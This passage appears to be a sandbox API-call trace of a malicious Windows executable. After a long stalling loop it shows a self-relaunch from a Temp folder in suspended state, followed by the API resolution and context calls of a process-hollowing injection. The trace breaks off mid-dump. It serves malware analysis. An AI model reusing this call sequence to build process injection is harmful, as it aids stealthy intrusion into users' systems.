lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.427] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.428] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.428] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.428] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.428] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.428] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.428] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.428] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.695] VirtualProtect (in: lpAddress=0x2834b8, dwSize=0x564a0, flNewProtect=0x40, lpflOldProtect=0x12fe48 | out: lpflOldProtect=0x12fe48*=0x4) returned 1 [0174.696] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0174.696] LoadLibraryA (lpLibFileName="user32") returned 0x76b40000 [0174.697] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0174.697] LoadLibraryA (lpLibFileName="kernel32") returned 0x76910000 [0174.697] GetProcAddress (hModule=0x76910000, lpProcName="WinExec") returned 0x7699e5fd [0174.697] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileA") returned 0x7695cee8 [0174.697] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0174.697] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0174.697] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessA") returned 0x76912082 [0174.697] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadContext") returned 0x76970cc1 [0174.697] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0174.697] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAllocEx") returned 0x7694c1b6 [0174.697] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0174.697] GetProcAddress (hModule=0x76910000, lpProcName="ReadProcessMemory") returned 0x7694c1ce [0174.697] GetProcAddress (hModule=0x76910000, lpProcName="WriteProcessMemory") returned 0x7694c1de [0174.697] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadContext") returned 0x769a0193 [0174.697] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0174.697] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0174.697] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameA") returned 0x769633f6 [0174.697] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineA") returned 0x769698ff [0174.697] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77230000 [0174.697] GetProcAddress (hModule=0x77230000, lpProcName="NtUnmapViewOfSection") returned 0x772769b8 [0174.697] GetProcAddress (hModule=0x76b40000, lpProcName="RegisterClassExA") returned 0x76b46293 [0174.697] GetProcAddress (hModule=0x76b40000, lpProcName="CreateWindowExA") returned 0x76b4bf40 [0174.697] GetProcAddress (hModule=0x76b40000, lpProcName="PostMessageA") returned 0x76b4b446 [0174.698] GetProcAddress (hModule=0x76b40000, lpProcName="GetMessageA") returned 0x76b51899 [0174.698] GetProcAddress (hModule=0x76b40000, lpProcName="DefWindowProcA") returned 0x76b4bb1c [0174.698] RegisterClassExA (param_1=0x12fbc0) returned 0xc159 [0174.698] CreateWindowExA (dwExStyle=0x200, lpClassName="bxVV7cGHPHusOnmHbFKqGnzKMpomaw", lpWindowName="ptodEzQlWskupc762Nhc3wjD8apfHQ", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x1c01fc [0174.729] PostMessageA (hWnd=0x1c01fc, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0174.729] GetMessageA (in: lpMsg=0x12fbf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x12fbf0) returned 1 [0174.729] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x1c0000 [0174.729] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1c0000, nSize=0x2800 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wspgagwn.exe")) returned 0x30 [0174.730] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"" [0174.730] CreateProcessA (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12faf0*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb48 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"", lpProcessInformation=0x12fb48*(hProcess=0x4c, hThread=0x48, dwProcessId=0xf68, dwThreadId=0x728)) returned 1 [0174.732] VirtualFree (lpAddress=0x1c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0174.732] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x1c0000 [0174.732] GetThreadContext (in: hThread=0x48, lpContext=0x1c0000 | out: lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdb000, Edx=0x0, Ecx=0x0, Eax=0x402581, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, 